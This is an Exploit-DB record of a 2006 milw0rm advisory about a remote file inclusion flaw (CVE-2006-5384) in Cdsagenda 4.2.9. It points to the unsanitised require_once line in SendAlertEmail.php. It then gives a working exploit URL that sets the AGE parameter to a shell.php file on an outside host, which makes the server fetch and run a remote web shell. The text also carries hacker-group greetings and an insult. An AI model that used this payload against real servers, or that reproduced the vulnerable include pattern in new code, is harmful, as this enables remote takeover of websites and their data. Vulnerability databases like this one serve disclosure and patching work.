Cdsagenda <= 4.2.9 - SendAlertEmail.php File Include Vulnerability

2006-10-13T00:00:00
ID EDB-ID:2540
Type exploitdb
Reporter Drago84
Modified 2006-10-13T00:00:00

Description

Cdsagenda <= 4.2.9 (SendAlertEmail.php) File Include Vulnerability. CVE-2006-5384. Webapps exploit for php platform

                                        
                                            ###### ToXiC #########################
#
#  Cdsagenda 4.2.9 Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                             Cdsagenda 4.2.9
#
#
#  Sorce Code:
#             http://cdsware.cern.ch/cdsagenda/download/cdsagenda-4.2.9.tar.gz
#
#
# Page:
#         SendAlertEmail.php
#
# Dir :
#      /cdsagenda-4.2.9/htdocs/modification/
#
#
# Problem:
#         require_once "$AGE/AgeDB.php";
#
#
#
# ExPloit :
#   http://www.site.com/cdsagenda/modification/SendAlertEmail.php?AGE=http://sonic-banda-di-lamer.gay/shell.php?
#
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# milw0rm.com [2006-10-13]